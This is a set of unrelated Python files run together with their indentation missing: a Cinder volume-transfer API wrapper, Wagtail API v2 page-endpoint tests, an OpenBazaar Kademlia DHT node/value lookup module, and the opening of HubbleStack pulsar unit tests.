"""
c_client = cinderclient(request)
return [VolumeTransfer(v) for v in c_client.transfers.list(
detailed=detailed, search_opts=search_opts)]
def transfer_get(request, transfer_id):
transfer_data = cinderclient(request).transfers.get(transfer_id)
return VolumeTransfer(transfer_data)
def transfer_create(request, transfer_id, name):
volume = cinderclient(request).transfers.create(transfer_id, name)
return VolumeTransfer(volume)
def transfer_accept(request, transfer_id, auth_key):
return cinderclient(request).transfers.accept(transfer_id, auth_key)
def transfer_delete(request, transfer_id):
return cinderclient(request).transfers.delete(transfer_id)
|
|
import json
import mock
import collections
from django.test import TestCase
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from wagtail.wagtailcore.models import Page
from wagtail.api.v2 import signal_handlers
from wagtail.tests.demosite import models
from wagtail.tests.testapp.models import StreamPage
def get_total_page_count():
# Need to take away 1 as the root page is invisible over the API
return Page.objects.live().public().count() - 1
class TestPageListing(TestCase):
fixtures = ['demosite.json']
def get_response(self, **params):
return self.client.get(reverse('wagtailapi_v2:pages:listing'), params)
def get_page_id_list(self, content):
return [page['id'] for page in content['items']]
# BASIC TESTS
def test_basic(self):
response = self.get_response()
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-type'], 'application/json')
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Check that the meta section is there
self.assertIn('meta', content)
self.assertIsInstance(content['meta'], dict)
# Check that the total count is there and correct
self.assertIn('total_count', content['meta'])
self.assertIsInstance(content['meta']['total_count'], int)
self.assertEqual(content['meta']['total_count'], get_total_page_count())
# Check that the items section is there
self.assertIn('items', content)
self.assertIsInstance(content['items'], list)
# Check that each page has a meta section with type, detail_url, html_url, slug and first_published_at attributes
for page in content['items']:
self.assertIn('meta', page)
self.assertIsInstance(page['meta'], dict)
self.assertEqual(set(page['meta'].keys()), {'type', 'detail_url', 'html_url', 'slug', 'first_published_at'})
def test_unpublished_pages_dont_appear_in_list(self):
total_count = get_total_page_count()
page = models.BlogEntryPage.objects.get(id=16)
page.unpublish()
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(content['meta']['total_count'], total_count - 1)
def test_private_pages_dont_appear_in_list(self):
total_count = get_total_page_count()
page = models.BlogIndexPage.objects.get(id=5)
page.view_restrictions.create(password='test')
new_total_count = get_total_page_count()
self.assertNotEqual(total_count, new_total_count)
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(content['meta']['total_count'], new_total_count)
# TYPE FILTER
def test_type_filter_items_are_all_blog_entries(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(page['meta']['type'], 'demosite.BlogEntryPage')
# No specific fields available by default
self.assertEqual(set(page.keys()), {'id', 'meta', 'title'})
def test_type_filter_total_count(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
# Total count must be reduced as this filters the results
self.assertEqual(content['meta']['total_count'], 3)
def test_type_filter_multiple(self):
response = self.get_response(type='demosite.BlogEntryPage,demosite.EventPage')
content = json.loads(response.content.decode('UTF-8'))
blog_page_seen = False
event_page_seen = False
for page in content['items']:
self.assertIn(page['meta']['type'], ['demosite.BlogEntryPage', 'demosite.EventPage'])
if page['meta']['type'] == 'demosite.BlogEntryPage':
blog_page_seen = True
elif page['meta']['type'] == 'demosite.EventPage':
event_page_seen = True
# Only generic fields available
self.assertEqual(set(page.keys()), {'id', 'meta', 'title'})
self.assertTrue(blog_page_seen, "No blog pages were found in the items")
self.assertTrue(event_page_seen, "No event pages were found in the items")
def test_non_existant_type_gives_error(self):
response = self.get_response(type='demosite.IDontExist')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "type doesn't exist"})
def test_non_page_type_gives_error(self):
response = self.get_response(type='auth.User')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "type doesn't exist"})
# FIELDS
def test_fields_default(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'title'})
self.assertEqual(set(page['meta'].keys()), {'type', 'detail_url', 'html_url', 'slug', 'first_published_at'})
def test_fields(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='title,date,feed_image')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'title', 'date', 'feed_image'})
def test_fields_child_relation(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='title,related_links')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'title', 'related_links'})
self.assertIsInstance(page['related_links'], list)
def test_fields_foreign_key(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='title,date,feed_image')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
feed_image = page['feed_image']
if feed_image is not None:
self.assertIsInstance(feed_image, dict)
self.assertEqual(set(feed_image.keys()), {'id', 'meta'})
self.assertIsInstance(feed_image['id'], int)
self.assertIsInstance(feed_image['meta'], dict)
self.assertEqual(set(feed_image['meta'].keys()), {'type', 'detail_url'})
self.assertEqual(feed_image['meta']['type'], 'wagtailimages.Image')
self.assertEqual(feed_image['meta']['detail_url'], 'http://localhost/api/v2beta/images/%d/' % feed_image['id'])
def test_fields_tags(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='tags')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'tags'})
self.assertIsInstance(page['tags'], list)
def test_fields_ordering(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='date,title,feed_image,related_links')
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Test field order
content = json.JSONDecoder(object_pairs_hook=collections.OrderedDict).decode(response.content.decode('UTF-8'))
field_order = [
'id',
'meta',
'title',
'date',
'feed_image',
'related_links',
]
self.assertEqual(list(content['items'][0].keys()), field_order)
def test_fields_without_type_gives_error(self):
response = self.get_response(fields='title,related_links')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "unknown fields: related_links"})
def test_fields_which_are_not_in_api_fields_gives_error(self):
response = self.get_response(fields='path')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "unknown fields: path"})
def test_fields_unknown_field_gives_error(self):
response = self.get_response(fields='123,title,abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "unknown fields: 123, abc"})
# FILTERING
def test_filtering_exact_filter(self):
response = self.get_response(title='Home page')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [2])
def test_filtering_exact_filter_on_specific_field(self):
response = self.get_response(type='demosite.BlogEntryPage', date='2013-12-02')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16])
def test_filtering_on_id(self):
response = self.get_response(id=16)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16])
def test_filtering_doesnt_work_on_specific_fields_without_type(self):
response = self.get_response(date='2013-12-02')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "query parameter is not an operation or a recognised field: date"})
def test_filtering_tags(self):
response = self.get_response(type='demosite.BlogEntryPage', tags='wagtail')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18])
def test_filtering_multiple_tags(self):
response = self.get_response(type='demosite.BlogEntryPage', tags='wagtail,bird')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16])
def test_filtering_unknown_field_gives_error(self):
response = self.get_response(not_a_field='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "query parameter is not an operation or a recognised field: not_a_field"})
# CHILD OF FILTER
def test_child_of_filter(self):
response = self.get_response(child_of=5)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18, 19])
def test_child_of_root(self):
# "root" gets children of the homepage of the current site
response = self.get_response(child_of='root')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [4, 5, 6, 20, 12])
def test_child_of_with_type(self):
response = self.get_response(type='demosite.EventPage', child_of=5)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [])
def test_child_of_unknown_page_gives_error(self):
response = self.get_response(child_of=1000)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "parent page doesn't exist"})
def test_child_of_not_integer_gives_error(self):
response = self.get_response(child_of='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "child_of must be a positive integer"})
def test_child_of_page_thats_not_in_same_site_gives_error(self):
# Root page is not in any site, so pretend it doesn't exist
response = self.get_response(child_of=1)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "parent page doesn't exist"})
# DESCENDANT OF FILTER
def test_descendant_of_filter(self):
response = self.get_response(descendant_of=6)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [10, 15, 17, 21, 22, 23])
def test_descendant_of_root(self):
# "root" gets decendants of the homepage of the current site
# Basically returns every page except the homepage
response = self.get_response(descendant_of='root')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [4, 8, 9, 5, 16, 18, 19, 6, 10, 15, 17, 21, 22, 23, 20, 13, 14, 12])
def test_descendant_of_with_type(self):
response = self.get_response(type='tests.EventPage', descendant_of=6)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [])
def test_descendant_of_unknown_page_gives_error(self):
response = self.get_response(descendant_of=1000)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "ancestor page doesn't exist"})
def test_descendant_of_not_integer_gives_error(self):
response = self.get_response(descendant_of='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "descendant_of must be a positive integer"})
def test_descendant_of_page_thats_not_in_same_site_gives_error(self):
# Root page is not in any site, so pretend it doesn't exist
response = self.get_response(descendant_of=1)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "ancestor page doesn't exist"})
def test_descendant_of_when_filtering_by_child_of_gives_error(self):
response = self.get_response(descendant_of=6, child_of=5)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "filtering by descendant_of with child_of is not supported"})
# ORDERING
def test_ordering_default(self):
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [2, 4, 8, 9, 5, 16, 18, 19, 6, 10, 15, 17, 21, 22, 23, 20, 13, 14, 12])
def test_ordering_by_title(self):
response = self.get_response(order='title')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [21, 22, 19, 23, 5, 16, 18, 12, 14, 8, 9, 4, 2, 13, 20, 17, 6, 10, 15])
def test_ordering_by_title_backwards(self):
response = self.get_response(order='-title')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [15, 10, 6, 17, 20, 13, 2, 4, 9, 8, 14, 12, 18, 16, 5, 23, 19, 22, 21])
def test_ordering_by_random(self):
response_1 = self.get_response(order='random')
content_1 = json.loads(response_1.content.decode('UTF-8'))
page_id_list_1 = self.get_page_id_list(content_1)
response_2 = self.get_response(order='random')
content_2 = json.loads(response_2.content.decode('UTF-8'))
page_id_list_2 = self.get_page_id_list(content_2)
self.assertNotEqual(page_id_list_1, page_id_list_2)
def test_ordering_by_random_backwards_gives_error(self):
response = self.get_response(order='-random')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "cannot order by 'random' (unknown field)"})
def test_ordering_by_random_with_offset_gives_error(self):
response = self.get_response(order='random', offset=10)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "random ordering with offset is not supported"})
def test_ordering_default_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18, 19])
def test_ordering_by_title_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage', order='title')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [19, 16, 18])
def test_ordering_by_specific_field_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage', order='date')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18, 19])
def test_ordering_by_unknown_field_gives_error(self):
response = self.get_response(order='not_a_field')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "cannot order by 'not_a_field' (unknown field)"})
# LIMIT
def test_limit_only_two_items_returned(self):
response = self.get_response(limit=2)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(len(content['items']), 2)
def test_limit_total_count(self):
response = self.get_response(limit=2)
content = json.loads(response.content.decode('UTF-8'))
# The total count must not be affected by "limit"
self.assertEqual(content['meta']['total_count'], get_total_page_count())
def test_limit_not_integer_gives_error(self):
response = self.get_response(limit='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "limit must be a positive integer"})
def test_limit_too_high_gives_error(self):
response = self.get_response(limit=1000)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "limit cannot be higher than 20"})
@override_settings(WAGTAILAPI_LIMIT_MAX=10)
def test_limit_maximum_can_be_changed(self):
response = self.get_response(limit=20)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "limit cannot be higher than 10"})
@override_settings(WAGTAILAPI_LIMIT_MAX=2)
def test_limit_default_changes_with_max(self):
# The default limit is 20. If WAGTAILAPI_LIMIT_MAX is less than that,
# the default should change accordingly.
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(len(content['items']), 2)
# OFFSET
def test_offset_5_usually_appears_5th_in_list(self):
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list.index(5), 4)
def test_offset_5_moves_after_offset(self):
response = self.get_response(offset=4)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list.index(5), 0)
def test_offset_total_count(self):
response = self.get_response(offset=10)
content = json.loads(response.content.decode('UTF-8'))
# The total count must not be affected by "offset"
self.assertEqual(content['meta']['total_count'], get_total_page_count())
def test_offset_not_integer_gives_error(self):
response = self.get_response(offset='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "offset must be a positive integer"})
# SEARCH
def test_search_for_blog(self):
response = self.get_response(search='blog')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
# Check that the items are the blog index and three blog pages
self.assertEqual(set(page_id_list), set([5, 16, 18, 19]))
def test_search_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(set(page_id_list), set([16, 18, 19]))
def test_search_when_ordering_gives_error(self):
response = self.get_response(search='blog', order='title')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "ordering with a search query is not supported"})
@override_settings(WAGTAILAPI_SEARCH_ENABLED=False)
def test_search_when_disabled_gives_error(self):
response = self.get_response(search='blog')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "search is disabled"})
def test_search_when_filtering_by_tag_gives_error(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog', tags='wagtail')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "filtering by tag with a search query is not supported"})
def test_search_operator_and(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog again', search_operator='and')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(set(page_id_list), set([18]))
def test_search_operator_or(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog again', search_operator='or')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(set(page_id_list), set([16, 18, 19]))
class TestPageDetail(TestCase):
fixtures = ['demosite.json']
def get_response(self, page_id, **params):
return self.client.get(reverse('wagtailapi_v2:pages:detail', args=(page_id, )), params)
def test_basic(self):
response = self.get_response(16)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-type'], 'application/json')
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Check the id field
self.assertIn('id', content)
self.assertEqual(content['id'], 16)
# Check that the meta section is there
self.assertIn('meta', content)
self.assertIsInstance(content['meta'], dict)
# Check the meta type
self.assertIn('type', content['meta'])
self.assertEqual(content['meta']['type'], 'demosite.BlogEntryPage')
# Check the meta detail_url
self.assertIn('detail_url', content['meta'])
self.assertEqual(content['meta']['detail_url'], 'http://localhost/api/v2beta/pages/16/')
# Check the meta html_url
self.assertIn('html_url', content['meta'])
self.assertEqual(content['meta']['html_url'], 'http://localhost/blog-index/blog-post/')
# Check the parent field
self.assertIn('parent', content['meta'])
self.assertIsInstance(content['meta']['parent'], dict)
self.assertEqual(set(content['meta']['parent'].keys()), {'id', 'meta'})
self.assertEqual(content['meta']['parent']['id'], 5)
self.assertIsInstance(content['meta']['parent']['meta'], dict)
self.assertEqual(set(content['meta']['parent']['meta'].keys()), {'type', 'detail_url', 'html_url'})
self.assertEqual(content['meta']['parent']['meta']['type'], 'demosite.BlogIndexPage')
self.assertEqual(content['meta']['parent']['meta']['detail_url'], 'http://localhost/api/v2beta/pages/5/')
self.assertEqual(content['meta']['parent']['meta']['html_url'], 'http://localhost/blog-index/')
# Check that the custom fields are included
self.assertIn('date', content)
self.assertIn('body', content)
self.assertIn('tags', content)
self.assertIn('feed_image', content)
self.assertIn('related_links', content)
self.assertIn('carousel_items', content)
# Check that the date was serialised properly
self.assertEqual(content['date'], '2013-12-02')
# Check that the tags were serialised properly
self.assertEqual(content['tags'], ['bird', 'wagtail'])
# Check that the feed image was serialised properly
self.assertIsInstance(content['feed_image'], dict)
self.assertEqual(set(content['feed_image'].keys()), {'id', 'meta'})
self.assertEqual(content['feed_image']['id'], 7)
self.assertIsInstance(content['feed_image']['meta'], dict)
self.assertEqual(set(content['feed_image']['meta'].keys()), {'type', 'detail_url'})
self.assertEqual(content['feed_image']['meta']['type'], 'wagtailimages.Image')
self.assertEqual(content['feed_image']['meta']['detail_url'], 'http://localhost/api/v2beta/images/7/')
# Check that the child relations were serialised properly
self.assertEqual(content['related_links'], [])
for carousel_item in content['carousel_items']:
self.assertEqual(set(carousel_item.keys()), {'id', 'meta', 'embed_url', 'link', 'caption', 'image'})
self.assertEqual(set(carousel_item['meta'].keys()), {'type'})
def test_meta_parent_id_doesnt_show_root_page(self):
# Root page isn't in the site so don't show it if the user is looking at the home page
response = self.get_response(2)
content = json.loads(response.content.decode('UTF-8'))
self.assertIsNone(content['meta']['parent'])
def test_field_ordering(self):
response = self.get_response(16)
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Test field order
content = json.JSONDecoder(object_pairs_hook=collections.OrderedDict).decode(response.content.decode('UTF-8'))
field_order = [
'id',
'meta',
'title',
'body',
'tags',
'date',
'feed_image',
'carousel_items',
'related_links',
]
self.assertEqual(list(content.keys()), field_order)
def test_null_foreign_key(self):
models.BlogEntryPage.objects.filter(id=16).update(feed_image_id=None)
response = self.get_response(16)
content = json.loads(response.content.decode('UTF-8'))
self.assertIn('related_links', content)
self.assertEqual(content['feed_image'], None)
class TestPageDetailWithStreamField(TestCase):
fixtures = ['test.json']
def setUp(self):
self.homepage = Page.objects.get(url_path='/home/')
def make_stream_page(self, body):
stream_page = StreamPage(
title='stream page',
slug='stream-page',
body=body
)
return self.homepage.add_child(instance=stream_page)
def test_can_fetch_streamfield_content(self):
stream_page = self.make_stream_page('[{"type": "text", "value": "foo"}]')
response_url = reverse('wagtailapi_v2:pages:detail', args=(stream_page.id, ))
response = self.client.get(response_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['content-type'], 'application/json')
content = json.loads(response.content.decode('utf-8'))
self.assertIn('id', content)
self.assertEqual(content['id'], stream_page.id)
self.assertIn('body', content)
self.assertEqual(content['body'], [{'type': 'text', 'value': 'foo'}])
def test_image_block(self):
stream_page = self.make_stream_page('[{"type": "image", "value": 1}]')
response_url = reverse('wagtailapi_v2:pages:detail', args=(stream_page.id, ))
response = self.client.get(response_url)
content = json.loads(response.content.decode('utf-8'))
# ForeignKeys in a StreamField shouldn't be translated into dictionary representation
self.assertEqual(content['body'], [{'type': 'image', 'value': 1}])
@override_settings(
WAGTAILFRONTENDCACHE={
'varnish': {
'BACKEND': 'wagtail.contrib.wagtailfrontendcache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000',
},
},
WAGTAILAPI_BASE_URL='http://api.example.com',
)
@mock.patch('wagtail.contrib.wagtailfrontendcache.backends.HTTPBackend.purge')
class TestPageCacheInvalidation(TestCase):
fixtures = ['demosite.json']
@classmethod
def setUpClass(cls):
super(TestPageCacheInvalidation, cls).setUpClass()
signal_handlers.register_signal_handlers()
@classmethod
def tearDownClass(cls):
super(TestPageCacheInvalidation, cls).tearDownClass()
signal_handlers.unregister_signal_handlers()
def test_republish_page_purges(self, purge):
Page.objects.get(id=2).save_revision().publish()
purge.assert_any_call('http://api.example.com/api/v2beta/pages/2/')
def test_unpublish_page_purges(self, purge):
Page.objects.get(id=2).unpublish()
purge.assert_any_call('http://api.example.com/api/v2beta/pages/2/')
def test_delete_page_purges(self, purge):
Page.objects.get(id=16).delete()
purge.assert_any_call('http://api.example.com/api/v2beta/pages/16/')
def test_save_draft_doesnt_purge(self, purge):
Page.objects.get(id=2).save_revision()
purge.assert_not_called()
|
|
"""
Copyright (c) 2014 Brian Muller
Copyright (c) 2015 OpenBazaar
"""
from collections import Counter, defaultdict
from twisted.internet import defer
from log import Logger
from dht.utils import deferredDict
from dht.node import Node, NodeHeap
from protos import objects
class SpiderCrawl(object):
"""
Crawl the network and look for given 160-bit keys.
"""
def __init__(self, protocol, node, peers, ksize, alpha):
"""
Create a new C{SpiderCrawl}er.
Args:
protocol: A :class:`~kademlia.protocol.KademliaProtocol` instance.
node: A :class:`~kademlia.node.Node` representing the key we're looking for
peers: A list of :class:`~kademlia.node.Node` instances that provide the entry point for the network
ksize: The value for k based on the paper
alpha: The value for alpha based on the paper
"""
self.protocol = protocol
self.ksize = ksize
self.alpha = alpha
self.node = node
self.nearest = NodeHeap(self.node, self.ksize)
self.lastIDsCrawled = []
self.log = Logger(system=self)
self.log.debug("creating spider with peers: %s" % peers)
self.nearest.push(peers)
def _find(self, rpcmethod):
"""
Get either a value or list of nodes.
Args:
rpcmethod: The protocol's callFindValue or callFindNode.
The process:
1. calls find_* to current ALPHA nearest not already queried nodes,
adding results to current nearest list of k nodes.
2. current nearest list needs to keep track of who has been queried already
sort by nearest, keep KSIZE
3. if list is same as last time, next call should be to everyone not
yet queried
4. repeat, unless nearest list has all been queried, then ur done
"""
self.log.debug("crawling with nearest: %s" % str(tuple(self.nearest)))
count = self.alpha
if self.nearest.getIDs() == self.lastIDsCrawled:
self.log.debug("last iteration same as current - checking all in list now")
count = len(self.nearest)
self.lastIDsCrawled = self.nearest.getIDs()
ds = {}
for peer in self.nearest.getUncontacted()[:count]:
ds[peer.id] = rpcmethod(peer, self.node)
self.nearest.markContacted(peer)
return deferredDict(ds).addCallback(self._nodesFound)
class ValueSpiderCrawl(SpiderCrawl):
def __init__(self, protocol, node, peers, ksize, alpha, save_at_nearest=True):
SpiderCrawl.__init__(self, protocol, node, peers, ksize, alpha)
# keep track of the single nearest node without value - per
# section 2.3 so we can set the key there if found
self.nearestWithoutValue = NodeHeap(self.node, 1)
self.saveToNearestWitoutValue = save_at_nearest
def find(self):
"""
Find either the closest nodes or the value requested.
"""
return self._find(self.protocol.callFindValue)
def _nodesFound(self, responses):
"""
Handle the result of an iteration in _find.
"""
toremove = []
foundValues = []
for peerid, response in responses.items():
response = RPCFindResponse(response)
if not response.happened():
toremove.append(peerid)
elif response.hasValue():
# since we get back a list of values, we will just extend foundValues (excluding duplicates)
foundValues = list(set(foundValues) | set(response.getValue()))
else:
peer = self.nearest.getNodeById(peerid)
self.nearestWithoutValue.push(peer)
self.nearest.push(response.getNodeList())
self.nearest.remove(toremove)
if len(foundValues) > 0:
return self._handleFoundValues(foundValues)
if self.nearest.allBeenContacted():
# not found!
return None
return self.find()
def _handleFoundValues(self, values):
"""
We got some values! Exciting. But let's make sure
they're all the same or freak out a little bit. Also,
make sure we tell the nearest node that *didn't* have
the value to store it.
"""
value_dict = defaultdict(list)
ttl_dict = defaultdict(list)
for v in values:
try:
d = objects.Value()
d.ParseFromString(v)
value_dict[d.valueKey].append(d.serializedData)
ttl_dict[d.valueKey].append(d.ttl)
except Exception:
pass
value = []
for k, v in value_dict.items():
ttl = ttl_dict[k]
if len(v) > 1:
valueCounts = Counter(v)
v = [valueCounts.most_common(1)[0][0]]
ttlCounts = Counter(ttl_dict[k])
ttl = [ttlCounts.most_common(1)[0][0]]
val = objects.Value()
val.valueKey = k
val.serializedData = v[0]
val.ttl = ttl[0]
value.append(val.SerializeToString())
if self.saveToNearestWitoutValue:
ds = []
peerToSaveTo = self.nearestWithoutValue.popleft()
if peerToSaveTo is not None:
for v in value:
try:
val = objects.Value()
val.ParseFromString(v)
ds.append(self.protocol.callStore(peerToSaveTo, self.node.id, val.valueKey,
val.serializedData, val.ttl))
except Exception:
pass
return defer.gatherResults(ds).addCallback(lambda _: value)
return value
class NodeSpiderCrawl(SpiderCrawl):
def __init__(self, protocol, node, peers, ksize, alpha, find_exact=False):
SpiderCrawl.__init__(self, protocol, node, peers, ksize, alpha)
self.find_exact = find_exact
def find(self):
"""
Find the closest nodes.
"""
return self._find(self.protocol.callFindNode)
def _nodesFound(self, responses):
"""
Handle the result of an iteration in _find.
"""
toremove = []
for peerid, response in responses.items():
response = RPCFindResponse(response)
if not response.happened():
toremove.append(peerid)
else:
node_list = response.getNodeList()
self.nearest.push(node_list)
if self.find_exact:
for node in node_list:
if node.id == self.node.id:
return [node]
self.nearest.remove(toremove)
if self.nearest.allBeenContacted():
return list(self.nearest)
return self.find()
class RPCFindResponse(object):
def __init__(self, response):
"""
A wrapper for the result of a RPC find.
Args:
response: This will be a tuple of (<response received>, <value>)
where <value> will be a list of tuples if not found or
a dictionary of {'value': v} where v is the value desired
"""
self.response = response
def happened(self):
"""
Did the other host actually respond?
"""
return self.response[0]
def hasValue(self):
if len(self.response) > 0 and len(self.response[1]) > 0:
if self.response[1][0] == "value":
return True
return False
def getValue(self):
return self.response[1][1:]
def getNodeList(self):
"""
Get the node list in the response. If there's no value, this should
be set.
"""
nodes = []
for node in self.response[1]:
try:
n = objects.Node()
n.ParseFromString(node)
newNode = Node(n.guid, n.nodeAddress.ip, n.nodeAddress.port, n.publicKey,
None if not n.HasField("relayAddress") else (n.relayAddress.ip, n.relayAddress.port),
n.natType,
n.vendor)
nodes.append(newNode)
except Exception:
pass
return nodes
|
|
import sys
import os
myPath = os.path.abspath(os.getcwd())
sys.path.insert(0, myPath)
import hubblestack.extmods.modules.pulsar as pulsar
from salt.exceptions import CommandExecutionError
import shutil
import six
import pyinotify
if os.environ.get('DEBUG_SHOW_PULSAR_LOGS'):
import logging
root_logger = logging.getLogger()
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
root_logger.addHandler(ch)
class TestPulsar():
def test_virtual(self):
var = pulsar.__virtual__()
assert var is True
def test_enqueue(self):
pulsar.__context__ = {}
var = pulsar._enqueue
assert var != 0
def test_get_notifier(self):
pulsar.__context__ = {}
var = pulsar._get_notifier
assert var != 0
def test_dict_update_for_merge_dict(self):
dest = {'key1': 'val1'}
upd = {'key_2': 'val_2'}
test_dict = {'key1': 'val1', 'key_2': 'val_2'}
var = pulsar._dict_update(dest, upd, recursive_update=True, merge_lists=False)
assert var == test_dict
def test_dict_update_for_classic_dictUpdate(self):
dest = {'key1': 'val1'}
upd = {'key_2': 'val_2'}
test_dict = {'key1': 'val1', 'key_2': 'val_2'}
var = pulsar._dict_update(dest, upd, recursive_update=False, merge_lists=False)
assert var == test_dict
def test_dict_update_for_dest_TypeError(self):
dest = 'TestValue1'
upd = {'key_1': 'val_1', 'key_2': 'val_2'}
